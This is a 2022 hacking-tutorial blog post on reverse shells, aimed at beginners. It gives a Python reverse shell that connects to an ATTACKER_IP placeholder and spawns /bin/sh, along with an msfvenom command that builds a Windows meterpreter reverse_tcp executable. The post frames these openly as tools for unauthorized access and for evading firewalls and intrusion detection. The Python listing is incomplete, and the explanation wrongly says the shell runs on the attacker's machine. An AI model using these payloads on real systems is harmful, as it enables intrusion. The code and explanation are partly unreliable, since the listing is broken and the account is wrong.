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Friday, April 15, 2022

Reverse Shells

Most linux administrators and even attackers have knowledge on how to navigate the command line, both in Windows and Linux systems. With respects to having to navigate file systems and look around a computer without the graphical user interface, we are used to, we make use of what we call a terminal. Most hackers who are proficient with linux mostly use the terminal to complete much more complicated tasks that the graphical user interface simply can't use. When an attacker has successfully enumerated and investigated the target system within the target network and finally needs the unauthorized remote access within the network, a reverse shell is simply what is used. A Reverse Shell, most technically referred to as a TCP Reverse Shell, is a program that opens a command shell such as sh or bash on a compromised system then connects back to an attacker-specified system to allow the attacker remote access of the command shell. 

Typically within networks, firewalls are put in place to prevent any incoming connections that will be coming from outside the respective network. For a normal shell session, the machine controlled by the attacker will actively have to connect to the victim machine within the target network... however the probability of this happening is very slim as the attacker is well aware that this will prove to be useless. An attacker has to ensure that his or her work to gain unauthorized access is as stealthy as possible. In modern networks that have firewalls in place to reject incoming traffic into the network and Intrusion Detection Systems, meant to pick up on any malicious activity will be able to see what is happening under the hood and detect that an attacker might be actively trying to establish a remote connection by directly connecting to the target. Instead of this happening, an attacker will instead investigate the target and find a means to gain unauthorized access to the network either via phishing attempts or vulnerability exploitation. When attempting to compromise a target system, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script to provide a convenient command shell for further malicious activities. This reverse shell will then cause the target system or server to connect to the attacker machine instead and establish a shell, thus bypassing firewall and IDS detection.

Below is an example of a reverse shell code written in python. This is done this way because when exploiting a vulnerability like command injection, this type of code would be inserted to allow the system to execute this code. This would then initialize the reverse shell so the target server will connect to the attacker controlled machine, essentially giving the attacker remote access. I would like to explain the vital parts of the code code below for the beginners or the curious.

user@kaizen:~$ cat

import socket
import subprocess
import os

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

socket.socket(socket.AF_INET, socket.SOCK_STREAM) - If you're familiar with python programming, you'll be well aware that python has a socket library, which has functions and methods responsible for socket programming. This line calls for the socket() function within the socket library. Within the brackets are the parameters which are to be passed into the socket() function, which are the AF_INET, responsible for the Internet IP Address family which is IPV4. SOCK_STREAM is the socket type for TCP, the protocol used to transport messages in the network.

s.connect(("ATTACKER_IP",ATTACKER_PORT)) - this makes use of the connect() method within the socket library, and this is where the attacker will then specify the IP and PORT the attacker is responsible for.[/bin/sh, "-i"]) - The subprocess module in Python is used to create new processes. This then calls the process /bin/sh, which is the path of where sh or bash is so it can be executed. This all happens on the attacker's machine in order to have remote /bin/bash access.

Other ways to create reverse shells is to craft payloads using executable binaries like .exe files for Windows. Best way to do this is using the Metasploit Framework.

Msfvenom is a command-line instance of The Metasploit Framework that is used to generate and output all of the various types of shellcode that are available in Metasploit. 

~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="ATTACKER_IP" LPORT="ATTACKER_PORT" -f exe revshell.exe


LHOST = (IP of Attacker Machine) 

LPORT = (PORT for the Attacker Machine) 

-p = (Payload I.e. Windows, Android, PHP etc.) 

F = file extension (i.e. windows=exe, android=apk etc.) 

o = “out file” to write to a location, which in this case is in the current working directory.

Once this executable file is dropped onto a remote target and executed, the reverse shell will be initiated, giving the attacker remote access.

Rounding Up

There are many other payloads and methods of initializing reverse shells for unauthorized remote access. This just gives a basic run down of how to do them in the simplest ways I know possible. Of course to be a successful hacker, intensive research is required within the domain of IT. This will allow you to have more creative approaches to create, drop reverse shells or even have your target execute reverse shells so you can have the remote access. Note that these methods (along with the others you will be researching cuz hacking is all about research) are also applicable for CTF challenges. Got more hacking tutorials comin up. Stay Tuned.

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